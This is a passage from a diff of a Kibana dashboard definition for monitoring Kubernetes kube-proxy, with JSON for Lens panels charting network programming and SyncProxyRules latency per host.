"savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "params": { + "axis_formatter": "number", + "axis_position": "left", + "axis_scale": "normal", + "background_color": "rgba(203,228,249,1)", + "drop_last_bucket": 0, + "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", + "index_pattern_ref_name": "metrics_ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd_0_index_pattern", + "interval": "", + "isModelInvalid": false, + "markdown": "Rules", + "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", + "markdown_vertical_align": "middle", + "max_lines_legend": 1, + "series": [ + { + "axis_position": "right", + "chart_type": "line", + "color": "#68BC00", + "fill": 0.5, + "formatter": "default", + "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", + "line_width": 1, + "metrics": [ { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", - "key": "data_stream.dataset", - "negate": false, - "params": { - "query": "kubernetes.proxy" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "data_stream.dataset": "kubernetes.proxy" - } - } + "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", + "type": "count" } - ], - "query": { - "language": "kuery", - "query": "" + ], + "override_index_pattern": 0, + "palette": { + "name": "default", + "type": "palette" + }, + "point_size": 1, + "separate_axis": 0, + "series_drop_last_bucket": 0, + "split_mode": "everything", + "stacked": "none", + "time_range_mode": "entire_time_range" } - } + ], + "show_grid": 1, + "show_legend": 1, + "time_field": "", + "time_range_mode": "entire_time_range", + "tooltip_mode": "show_all", + "truncate_legend": 1, + "type": "markdown", + "use_kibana_indexes": true + }, + "title": "", + "type": "metrics", + "uiState": {} + }, + "type": "visualization" }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": true, - "syncCursor": true, - "syncTooltips": false, - "useMargins": true + "title": "Proxy" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "f74e1a86-4370-4f65-a3b8-d92c9f25ff42", + "w": 24, + "x": 0, + "y": 7 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "panelIndex": "f74e1a86-4370-4f65-a3b8-d92c9f25ff42", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-5de1942f-e0a5-4ed8-86c0-972d57d62085", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "5de1942f-e0a5-4ed8-86c0-972d57d62085": { + "columnOrder": [ + "f80bbb4a-6177-4118-9483-7f58928032d4", + "8cb92e23-1df9-41ca-8061-ad76616f76c7", + "a436f8a7-433c-4b20-b115-717f4da445cb", + "a436f8a7-433c-4b20-b115-717f4da445cbX2", + "a436f8a7-433c-4b20-b115-717f4da445cbX1", + "a436f8a7-433c-4b20-b115-717f4da445cbX0" + ], + "columns": { + "8cb92e23-1df9-41ca-8061-ad76616f76c7": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" }, - "description": "", - "id": "", - "params": { - "fontSize": 12, - "markdown": "### Proxy\n\nThis dashboard collects data from [kube proxy](https://kubernetes.io/docs/concepts/overview/components/#kube-proxy) endpoint. Its purpose is to give an overview of what is happening inside it and detect problems that might be happening.", - "openLinksInNewTab": false + "a436f8a7-433c-4b20-b115-717f4da445cb": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Latency", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 2, + "suffix": "s" + } + }, + "formula": "last_value(kubernetes.proxy.sync.networkprogramming.duration.us.sum)/(pick_max(last_value(kubernetes.proxy.sync.networkprogramming.duration.us.count),1))/1000000", + "isFormulaBroken": false + }, + "references": [ + "a436f8a7-433c-4b20-b115-717f4da445cbX2" + ], + "scale": "ratio" }, - "title": "", - "type": "markdown", - "uiState": {} - } - }, - "gridData": { - "h": 4, - "i": "c13eb504-6afb-4fa5-8a7d-a75c5fee15b7", - "w": 48, - "x": 0, - "y": 0 - }, - "panelIndex": "c13eb504-6afb-4fa5-8a7d-a75c5fee15b7", - "type": "visualization", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "a436f8a7-433c-4b20-b115-717f4da445cbX0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.proxy.sync.networkprogramming.duration.us.sum: *" + }, + "isBucketed": false, + "label": "Part of Latency", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.proxy.sync.networkprogramming.duration.us.sum" }, - "description": "", - "params": { - "axis_formatter": "number", - "axis_position": "left", - "axis_scale": "normal", - "background_color": "rgba(203,228,249,1)", - "drop_last_bucket": 0, - "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", - "index_pattern_ref_name": "metrics_ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd_0_index_pattern", - "interval": "", - "isModelInvalid": false, - "markdown": "Rules", - "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", - "markdown_vertical_align": "middle", - "max_lines_legend": 1, - "series": [ - { - "axis_position": "right", - "chart_type": "line", - "color": "#68BC00", - "fill": 0.5, - "formatter": "default", - "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", - "line_width": 1, - "metrics": [ - { - "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", - "type": "count" - } - ], - "override_index_pattern": 0, - "palette": { - "name": "default", - "type": "palette" - }, - "point_size": 1, - "separate_axis": 0, - "series_drop_last_bucket": 0, - "split_mode": "everything", - "stacked": "none", - "time_range_mode": "entire_time_range" - } - ], - "show_grid": 1, - "show_legend": 1, - "time_field": "", - "time_range_mode": "entire_time_range", - "tooltip_mode": "show_all", - "truncate_legend": 1, - "type": "markdown", - "use_kibana_indexes": true + "a436f8a7-433c-4b20-b115-717f4da445cbX1": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.proxy.sync.networkprogramming.duration.us.count: *" + }, + "isBucketed": false, + "label": "Part of Latency", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.proxy.sync.networkprogramming.duration.us.count" }, - "title": "", - "type": "metrics", - "uiState": {} - } - }, - "gridData": { - "h": 3, - "i": "ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd", - "w": 48, - "x": 0, - "y": 4 - }, - "panelIndex": "ff6afcdf-0de2-47fb-aa9e-72b48f11e0cd", - "title": "Proxy", - "type": "visualization", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-5de1942f-e0a5-4ed8-86c0-972d57d62085", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "5de1942f-e0a5-4ed8-86c0-972d57d62085": { - "columnOrder": [ - "f80bbb4a-6177-4118-9483-7f58928032d4", - "8cb92e23-1df9-41ca-8061-ad76616f76c7", - "a436f8a7-433c-4b20-b115-717f4da445cb", - "a436f8a7-433c-4b20-b115-717f4da445cbX2", - "a436f8a7-433c-4b20-b115-717f4da445cbX1", - "a436f8a7-433c-4b20-b115-717f4da445cbX0" - ], - "columns": { - "8cb92e23-1df9-41ca-8061-ad76616f76c7": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "a436f8a7-433c-4b20-b115-717f4da445cb": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Latency", - "operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 2, - "suffix": "s" - } - }, - "formula": "last_value(kubernetes.proxy.sync.networkprogramming.duration.us.sum)/(pick_max(last_value(kubernetes.proxy.sync.networkprogramming.duration.us.count),1))/1000000", - "isFormulaBroken": false - }, - "references": [ - "a436f8a7-433c-4b20-b115-717f4da445cbX2" - ], - "scale": "ratio" - }, - "a436f8a7-433c-4b20-b115-717f4da445cbX0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.proxy.sync.networkprogramming.duration.us.sum: *" - }, - "isBucketed": false, - "label": "Part of Latency", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.proxy.sync.networkprogramming.duration.us.sum" - }, - "a436f8a7-433c-4b20-b115-717f4da445cbX1": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.proxy.sync.networkprogramming.duration.us.count: *" - }, - "isBucketed": false, - "label": "Part of Latency", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.proxy.sync.networkprogramming.duration.us.count" - }, - "a436f8a7-433c-4b20-b115-717f4da445cbX2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of Latency", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - { - "args": [ - "a436f8a7-433c-4b20-b115-717f4da445cbX0", - { - "args": [ - "a436f8a7-433c-4b20-b115-717f4da445cbX1", - 1 - ], - "location": { - "max": 152, - "min": 70 - }, - "name": "pick_max", - "text": "pick_max(last_value(kubernetes.proxy.sync.networkprogramming.duration.us.count),1)", - "type": "function" - } - ], - "name": "divide", - "type": "function" - }, - 1000000 - ], - "location": { - "max": 161, - "min": 0 - }, - "name": "divide", - "text": "last_value(kubernetes.proxy.sync.networkprogramming.duration.us.sum)/(pick_max(last_value(kubernetes.proxy.sync.networkprogramming.duration.us.count),1))/1000000", - "type": "function" - } - }, - "references": [ - "a436f8a7-433c-4b20-b115-717f4da445cbX0", - "a436f8a7-433c-4b20-b115-717f4da445cbX1" - ], - "scale": "ratio" - }, - "f80bbb4a-6177-4118-9483-7f58928032d4": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of host.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "host.name" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ + "a436f8a7-433c-4b20-b115-717f4da445cbX2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of Latency", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + { + "args": [ + "a436f8a7-433c-4b20-b115-717f4da445cbX0", { - "accessors": [ - "a436f8a7-433c-4b20-b115-717f4da445cb" - ], - "layerId": "5de1942f-e0a5-4ed8-86c0-972d57d62085", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "f80bbb4a-6177-4118-9483-7f58928032d4", - "xAccessor": "8cb92e23-1df9-41ca-8061-ad76616f76c7" + "args": [ + "a436f8a7-433c-4b20-b115-717f4da445cbX1", + 1 + ], + "location": { + "max": 152, + "min": 70 + }, + "name": "pick_max", + "text": "pick_max(last_value(kubernetes.proxy.sync.networkprogramming.duration.us.count),1)", + "type": "function" } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right", - "shouldTruncate": false + ], + "name": "divide", + "type": "function" }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "", - "yTitle": "" + 1000000 + ], + "location": { + "max": 161, + "min": 0 + }, + "name": "divide", + "text": "last_value(kubernetes.proxy.sync.networkprogramming.duration.us.sum)/(pick_max(last_value(kubernetes.proxy.sync.networkprogramming.duration.us.count),1))/1000000", + "type": "function" } + }, + "references": [ + "a436f8a7-433c-4b20-b115-717f4da445cbX0", + "a436f8a7-433c-4b20-b115-717f4da445cbX1" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 14, - "i": "f74e1a86-4370-4f65-a3b8-d92c9f25ff42", - "w": 24, - "x": 0, - "y": 7 - }, - "panelIndex": "f74e1a86-4370-4f65-a3b8-d92c9f25ff42", - "title": "Average network programming latency", - "type": "lens", - "version": "8.6.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-0b5eadf5-2a9c-49a2-b862-d317822adfd8", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "0b5eadf5-2a9c-49a2-b862-d317822adfd8": { - "columnOrder": [ - "9ce45236-05a8-478a-a1e1-85ccd013786c", - "c159c217-ff39-456c-ae61-593bb727a2df", - "9203a269-fdcb-4598-859d-d73f8c9734e0", - "9203a269-fdcb-4598-859d-d73f8c9734e0X0", - "9203a269-fdcb-4598-859d-d73f8c9734e0X2", - "9203a269-fdcb-4598-859d-d73f8c9734e0X1" - ], - "columns": { - "9203a269-fdcb-4598-859d-d73f8c9734e0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Average latency", - "operationType": "formula", - "params": { - "format": { - "id": "number", - "params": { - "decimals": 2, - "suffix": "s" - } - }, - "formula": "last_value(kubernetes.proxy.sync.rules.duration.us.sum, kql='kubernetes.proxy.sync.rules.duration.us.sum: *')/last_value(kubernetes.proxy.sync.rules.duration.us.count, kql='kubernetes.proxy.sync.rules.duration.us.count: *')/1000000", - "isFormulaBroken": false - }, - "references": [ - "9203a269-fdcb-4598-859d-d73f8c9734e0X2" - ], - "scale": "ratio" - }, - "9203a269-fdcb-4598-859d-d73f8c9734e0X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.proxy.sync.rules.duration.us.sum: *" - }, - "isBucketed": false, - "label": "Part of last_value(kubernetes.proxy.sync.rules.duration.us.sum, kql='kubernetes.proxy.sync.rules.duration.us.sum: *')/last_value(kubernetes.proxy.sync.rules.duration.us.count, kql='kubernetes.proxy.sync.rules.duration.us.count: *')/1000000", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.proxy.sync.rules.duration.us.sum" - }, - "9203a269-fdcb-4598-859d-d73f8c9734e0X1": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.proxy.sync.rules.duration.us.count: *" - }, - "isBucketed": false, - "label": "Part of last_value(kubernetes.proxy.sync.rules.duration.us.sum, kql='kubernetes.proxy.sync.rules.duration.us.sum: *')/last_value(kubernetes.proxy.sync.rules.duration.us.count, kql='kubernetes.proxy.sync.rules.duration.us.count: *')/1000000", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.proxy.sync.rules.duration.us.count" - }, - "9203a269-fdcb-4598-859d-d73f8c9734e0X2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of last_value(kubernetes.proxy.sync.rules.duration.us.sum, kql='kubernetes.proxy.sync.rules.duration.us.sum: *')/last_value(kubernetes.proxy.sync.rules.duration.us.count, kql='kubernetes.proxy.sync.rules.duration.us.count: *')/1000000", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - { - "args": [ - "9203a269-fdcb-4598-859d-d73f8c9734e0X0", - "9203a269-fdcb-4598-859d-d73f8c9734e0X1" - ], - "name": "divide", - "type": "function" - }, - 1000000 - ], - "location": { - "max": 231, - "min": 0 - }, - "name": "divide", - "text": "last_value(kubernetes.proxy.sync.rules.duration.us.sum, kql='kubernetes.proxy.sync.rules.duration.us.sum: *')/last_value(kubernetes.proxy.sync.rules.duration.us.count, kql='kubernetes.proxy.sync.rules.duration.us.count: *')/1000000", - "type": "function" - } - }, - "references": [ - "9203a269-fdcb-4598-859d-d73f8c9734e0X0", - "9203a269-fdcb-4598-859d-d73f8c9734e0X1" - ], - "scale": "ratio" - }, - "9ce45236-05a8-478a-a1e1-85ccd013786c": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of host.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "host.name" - }, - "c159c217-ff39-456c-ae61-593bb727a2df": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + "f80bbb4a-6177-4118-9483-7f58928032d4": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of host.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "9203a269-fdcb-4598-859d-d73f8c9734e0" - ], - "layerId": "0b5eadf5-2a9c-49a2-b862-d317822adfd8", - "layerType": "data", - "position": "top", - "seriesType": "line", - "showGridlines": false, - "splitAccessor": "9ce45236-05a8-478a-a1e1-85ccd013786c", - "xAccessor": "c159c217-ff39-456c-ae61-593bb727a2df" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right", - "shouldTruncate": false - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "", - "yTitle": "" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "size": 10 + }, + "scale": "ordinal", + "sourceField": "host.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 14, - "i": "34de2f11-faf2-49e8-aada-98c2cd5eb266", - "w": 24, - "x": 24, - "y": 7 + "layers": [ + { + "accessors": [ + "a436f8a7-433c-4b20-b115-717f4da445cb" + ], + "layerId": "5de1942f-e0a5-4ed8-86c0-972d57d62085", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "f80bbb4a-6177-4118-9483-7f58928032d4", + "xAccessor": "8cb92e23-1df9-41ca-8061-ad76616f76c7" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "shouldTruncate": false }, - "panelIndex": "34de2f11-faf2-49e8-aada-98c2cd5eb266", - "title": "Average SyncProxyRules latency ", - "type": "lens", - "version": "8.6.0" + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true, - "savedVis": { - "data": { - "aggs": [], - "searchSource": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Average network programming latency" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "34de2f11-faf2-49e8-aada-98c2cd5eb266", + "w": 24, + "x": 24, + "y": 7 + }, + "panelIndex": "34de2f11-faf2-49e8-aada-98c2cd5eb266", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-0b5eadf5-2a9c-49a2-b862-d317822adfd8", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "0b5eadf5-2a9c-49a2-b862-d317822adfd8": { + "columnOrder": [ + "9ce45236-05a8-478a-a1e1-85ccd013786c", + "c159c217-ff39-456c-ae61-593bb727a2df", + "9203a269-fdcb-4598-859d-d73f8c9734e0", + "9203a269-fdcb-4598-859d-d73f8c9734e0X0", + "9203a269-fdcb-4598-859d-d73f8c9734e0X2", + "9203a269-fdcb-4598-859d-d73f8c9734e0X1" + ], + "columns": { + "9203a269-fdcb-4598-859d-d73f8c9734e0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Average latency", + "operationType": "formula", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 2, + "suffix": "s" + } + }, + "formula": "last_value(kubernetes.proxy.sync.rules.duration.us.sum, kql='kubernetes.proxy.sync.rules.duration.us.sum: *')/last_value(kubernetes.proxy.sync.rules.duration.us.count, kql='kubernetes.proxy.sync.rules.duration.us.count: *')/1000000", + "isFormulaBroken": false + }, + "references": [ + "9203a269-fdcb-4598-859d-d73f8c9734e0X2" + ], + "scale": "ratio" + }, + "9203a269-fdcb-4598-859d-d73f8c9734e0X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.proxy.sync.rules.duration.us.sum: *" + }, + "isBucketed": false, + "label": "Part of last_value(kubernetes.proxy.sync.rules.duration.us.sum, kql='kubernetes.proxy.sync.rules.duration.us.sum: *')/last_value(kubernetes.proxy.sync.rules.duration.us.count, kql='kubernetes.proxy.sync.rules.duration.us.count: *')/1000000", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.proxy.sync.rules.duration.us.sum" + }, + "9203a269-fdcb-4598-859d-d73f8c9734e0X1": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "kubernetes.proxy.sync.rules.duration.us.count: *" + }, + "isBucketed": false, + "label": "Part of last_value(kubernetes.proxy.sync.rules.duration.us.sum, kql='kubernetes.proxy.sync.rules.duration.us.sum: *')/last_value(kubernetes.proxy.sync.rules.duration.us.count, kql='kubernetes.proxy.sync.rules.duration.us.count: *')/1000000", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.proxy.sync.rules.duration.us.count" }, - "description": "", - "params": { - "axis_formatter": "number", - "axis_position": "left", - "axis_scale": "normal", - "background_color": "rgba(239,249,218,1)", - "drop_last_bucket": 0, - "id": "6f526672-7eb3-4643-b49d-676d2eeac17b", - "index_pattern_ref_name": "metrics_c3fee68f-01c6-49da-a759-2900b1cd15bf_0_index_pattern", - "interval": "", - "isModelInvalid": false, - "markdown": "Process", - "markdown_css": "font-family:system-ui,\"Segoe UI\",Helvetica,Arial,sans-serif,\"Segoe UI Emoji\",\"Segoe UI Symbol\";font-weight:500;font-kerning:normal;font-size:36px;font-stretch:100%;font-style:normal;font-variant-caps:normal;font-variant-east-asian:normal;font-variant-ligatures:normal;font-variant-numeric:normal;\np {\n text-align: center;\n } a{text-decoration:none !important;}", - "markdown_vertical_align": "middle", - "max_lines_legend": 1, - "series": [ + "9203a269-fdcb-4598-859d-d73f8c9734e0X2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of last_value(kubernetes.proxy.sync.rules.duration.us.sum, kql='kubernetes.proxy.sync.rules.duration.us.sum: *')/last_value(kubernetes.proxy.sync.rules.duration.us.count, kql='kubernetes.proxy.sync.rules.duration.us.count: *')/1000000", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ { - "axis_position": "right", - "chart_type": "line", - "color": "#68BC00", - "fill": 0.5, - "formatter": "default", - "id": "d65c8740-c2c0-4471-9f94-38baadcf2df2", - "line_width": 1, - "metrics": [ - { - "id": "6a297bc8-ba40-4dbe-b5bc-6ca95dc292bb", - "type": "count" - } - ], - "override_index_pattern": 0, - "palette": { - "name": "default", - "type": "palette" - }, - "point_size": 1, - "separate_axis": 0, - "series_drop_last_bucket": 0, - "split_mode": "everything", - "stacked": "none", - "time_range_mode": "entire_time_range" - } - ], - "show_grid": 1, - "show_legend": 1, - "time_field": "", - "time_range_mode": "entire_time_range", - "tooltip_mode": "show_all", - "truncate_legend": 1, - "type": "markdown", - "use_kibana_indexes": true + "args": [ + "9203a269-fdcb-4598-859d-d73f8c9734e0X0", + "9203a269-fdcb-4598-859d-d73f8c9734e0X1" + ], + "name": "divide", + "type": "function" + }, + 1000000 + ], + "location": { + "max": 231, + "min": 0 + }, + "name": "divide", + "text": "last_value(kubernetes.proxy.sync.rules.duration.us.sum, kql='kubernetes.proxy.sync.rules.duration.us.sum: *')/last_value(kubernetes.proxy.sync.rules.duration.us.count, kql='kubernetes.proxy.sync.rules.duration.us.count: *')/1000000", + "type": "function" + } + }, + "references": [ + "9203a269-fdcb-4598-859d-d73f8c9734e0X0", + "9203a269-fdcb-4598-859d-d73f8c9734e0X1" + ], + "scale": "ratio" + }, + "9ce45236-05a8-478a-a1e1-85ccd013786c": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of host.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" + }, + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "host.name" }, - "title": "", - "type": "metrics", - "uiState": {} + "c159c217-ff39-456c-ae61-593bb727a2df": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 3, - "i": "c3fee68f-01c6-49da-a759-2900b1cd15bf", - "w": 48, - "x": 0, - "y": 21 + "layers": [ + { + "accessors": [ + "9203a269-fdcb-4598-859d-d73f8c9734e0" + ], + "layerId": "0b5eadf5-2a9c-49a2-b862-d317822adfd8", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "9ce45236-05a8-478a-a1e1-85ccd013786c", + "xAccessor": "c159c217-ff39-456c-ae61-593bb727a2df" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "shouldTruncate": false }, - "panelIndex": "c3fee68f-01c6-49da-a759-2900b1cd15bf", - "title": "", - "type": "visualization", - "version": "8.6.0" + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide", + "xTitle": "", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-380c5d66-2e69-4e96-b5fb-ac4e5ab1c807", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "169f9d33-cf55-422e-906e-f4eecb26a362", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "380c5d66-2e69-4e96-b5fb-ac4e5ab1c807": { - "columnOrder": [ - "6cbab896-ee42-4dad-8831-12f53cda0d6d", - "910bd079-4852-48bd-9d7a-e5eb940f0838", - "ee812faf-6f3c-4cc2-ad9a-27136340ef39", - "96c80749-da61-425a-b637-878d33e410fd", - "96c80749-da61-425a-b637-878d33e410fdX0", - "96c80749-da61-425a-b637-878d33e410fdX2", - "96c80749-da61-425a-b637-878d33e410fdX1", - "910bd079-4852-48bd-9d7a-e5eb940f0838X0", - "ee812faf-6f3c-4cc2-ad9a-27136340ef39X0" - ], - "columns": { - "6cbab896-ee42-4dad-8831-12f53cda0d6d": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Host", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "host.name" - }, - "910bd079-4852-48bd-9d7a-e5eb940f0838": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Resident memory", - "operationType": "formula", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 2 - } - }, - "formula": 